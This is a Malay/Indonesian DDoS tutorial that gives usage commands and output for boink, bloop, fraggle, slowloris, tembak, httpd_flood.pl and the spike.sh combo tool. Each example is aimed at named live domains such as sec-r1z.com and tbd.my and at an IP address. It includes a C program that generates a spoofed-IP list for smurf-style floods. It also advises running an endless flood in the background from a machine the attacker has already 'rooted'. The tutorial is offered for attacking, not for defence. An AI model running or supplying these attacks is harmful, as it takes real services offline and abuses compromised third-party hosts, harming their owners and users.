TOOLS DDOS
Boink
Merupakan tool yang boleh membuat blue screen of death pada mesin-mesin windows 9x dan nt.
Berikut contoh cara penggunaanya:
bt ~ # ./boink 127.0.0.1 74.63.241.86 80 80 99999999999
(0)74.63.241.86:25->65
(1)74.63.241.86:25->65
(2)74.63.241.86:25->65
(3)74.63.241.86:25->65
(4)74.63.241.86:25->65
(5)74.63.241.86:25->65
(6)74.63.241.86:25->65
(7)74.63.241.86:25->65
(8)74.63.241.86:25->65
(9)74.63.241.86:25->65
(10)74.63.241.86:25->65
(11)74.63.241.86:25->65
(12)74.63.241.86:25->65
(13)74.63.241.86:25->65
(14)74.63.241.86:25->65
(15)74.63.241.86:25->65
(16)74.63.241.86:25->65
(17)74.63.241.86:25->65
(18)74.63.241.86:25->65
(19)74.63.241.86:25->65
(20)74.63.241.86:25->65
(21)74.63.241.86:25->65
(22)74.63.241.86:25->65
(23)74.63.241.86:25->65
(24)74.63.241.86:25->65
(25)74.63.241.86:25->65
dst ...........
Smurf & UDP Attack
Smurf attack merupakan teknik penyerangan dengan mengirimkan paket icmp yang dispoof ke target kita
Bloop
Merupakan salah satu tool dos dengan metode smurf attack.
Bloop akan mengirimkan paket icmp spoof secara acak ke target kita untuk membuat mesin target crash.
Berikut adalah contoh penggunaan bloop:
bt ~ # ./bloop 127.0.0.1 sec-r1z.com 99999999
Bloop v 1.0
Status: Connected....packets sent.
Fraggle
Fraggle merupakan tool untuk tipe smurf dos / ddos yang menggunakan suatu file broadcast yang berisi daftar alamat2 ip spoof.
Sebelum menggunakan fraggle kita memerlukan sebuah file broadcast ip spoof, Untuk itu
saya sudah membuat sendiri tool untuk spoof ip generator namanya dimas.c:
filename:dimas.c , programmer: mywisdom
/*dimas.c random ip generator (public ip and private ip)
version 1.0
c0d3r: mywisdom
greetz:gunslinger,flyff666,kiddies,xtr0nic,whitehat,Danzel and so on
*/
#include
#include
#include
void bikin_random_ip()
{
FILE *dom2;
int a,b,c,d,a2,b2,jum;
dom2=fopen("ip.txt","w+");
for(;;)
{
srand ( time(NULL) );
a = rand ()% 255 ;
b = rand ()% 255 ;
c = rand ()% 255 ;
d = rand ()% 255 ;
if ( (a != 10) && (a != 172) && (a != 192))
{
if(dom2!=NULL)
{
if(a2!=a)
{
fprintf(dom2,"%d.%d.%d.%d\n",a,b,c,d);
}
}
}
a2=a;
}
fclose(dom2);
}
int main ()
{
bikin_random_ip();
return 0;
}
kompile file di atas dan run untuk membuat file ip spoof dengan nama file: ip.txt
gcc -o dimas dimas.c
./dimas
Selanjutnya misal target kita sec-r1z.com, contoh penggunaan fraggle untuk menyerang sec-r1z.com:
bt ~ # ./fraggle sec-r1z.com ip.txt 2000 900 80 0 99
fraggle.c by TFreak
Flooding sec-r1z.com (. = 25 outgoing packets)
................................................................................
Done!
bt ~ #
slowloris
slowloris biasanya khusus digunakan untuk menyerang http port
,keunggulan slowloris adalah hanya menggunakan bandwith yang kecil dari server attacker,
tool ini akan mengirimkan http request dalam ukuran panjang berupa angka random panjang
terlihat dari source codenya:
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
Contoh penggunaan slowloris untuk menyerang sec-r1z.com :
bt ~ # ./slowloris.pl -dns www.sec-r1z.com -port 80 -timeout 30 -num 500 -cache
hacker by:..................
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
Defaulting to a 5 second tcp connection timeout.
Multithreading enabled.
Connecting to www.sec-r1z.com:80 every 30 seconds with 500 sockets:
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
tembak.c
tools ciptaan nick kluang johor ) dah ada dari zaman baharu ), ok mari kita cuba gunakan lagi untuk contoh target sec-r1z.com :
bt ~ # ./tembak
hantar Paket ke IP orang
Cara gunakan : $ tembak hostname.orang port
bt ~ # ./tembak sec-r1z.com 80
Serbuu....!!!! Hancurkaannn sec-r1z.com ke port 80
httpd_flood.pl
Ini dia perl skrip khusus untuk bergantung socket httpd ).khusus hanya menyerang http daemon (port 80)
Berikut ini adalah contoh cara menggunakannya, contohnya target tbd.my, contohnya kita menggunakan serangan yang lama infinite (selamanya) dan kita run di background di salah satu mesin yang kita root:
./httpd_flood.pl tbd.my -1 99999 -1 &
Teknik Serangan Gabungan
Teknik serangan gabungan ini menggabungkan aneka jenis serangan, Anda boleh mencuba tool ini: spike
ok mari kita lihat semua tool2 yang digabung menjadi satu teknik serangan dimatikan oleh spike:
bt spike # ls
README bin/ sources/ spike.sh* spike.sh~*
bt spike # ls bin
1234* conseal* jolt* latierra* orgasm* spiffit* teardrop*
beer* dcd3c* kkill* misfrag* pepsi* sping* trash*
boink* fawx* koc* nestea* pimp* stream* udpdata*
bonk* gewse* kox* newtear* pong* syndrop* wingatecrash*
coke* gewse5* land* opentear* smurf* synk*
bt spike #
sudah anda lihat,tool ini menggabungkan berbagai macam ddos tool menjadi 1
Mari kita cuba run tool ini untuk attack target kita target: sec-r1z.com
bt spike # ./spike.sh sec-r1z.com
Main Menu For spike.sh
1] Combo Attacks
2] Pick The Attack
3] Pick The Attack2 (Enter Your Own Info)
4] Class C Attack (Drop A Class C)
5] Never Die (Attacks That Never Die)
6] Clean up (Kill Hung Attacks)
7] Info Menu (Other Info About spike.sh)
8] To Exit Out
Enter The Number Of The Option To Run:
contoh kita ingin menggunakan combo attack untuk menyerang target kita
klik 1.
Maka akan muncul pilihan 3 jenis serangan berdasarkan tingkat ganasnya serangan ( minta maaf nick kluang johor sedang menyerang komputer anda server anda akan musnah ):
ComboAttack Menu\033[0m
1] Light Attack (12 Attacks)
2] Medium Attack (20 Attacks)
3] Hard Attack (33 Attacks)
4] To Exit Out
Enter The Number Of The Option To Run
#> \c
contoh kita pilih yang hard attack, klik 3 !!!
omboAttack Menu\033[0m
1] Light Attack (12 Attacks)
2] Medium Attack (20 Attacks)
3] Hard Attack (33 Attacks)
4] To Exit Out
Enter The Number Of The Option To Run
#> \c
3
Teadroping.....
Completed....
Pimping.....
Completed....
Nesteaing.....
Completed....
Misfraging.....
Completed....
Syndroping.....
Completed....
Koxing.....
Completed....
NewTearing.....
Completed....
Bonking.....
Completed....
Fawxing.....
Completed....
Trashing.....
Completed....
Smurfing....
Completed....
Attacking On Hold For BandWidth
Completed....
Boinking.....
Completed....
Conseal Firewall Attacking.....
Completed....
Jolting.....
Completed....
Modem +++ DoSing
dst...
tamat tutorial ddos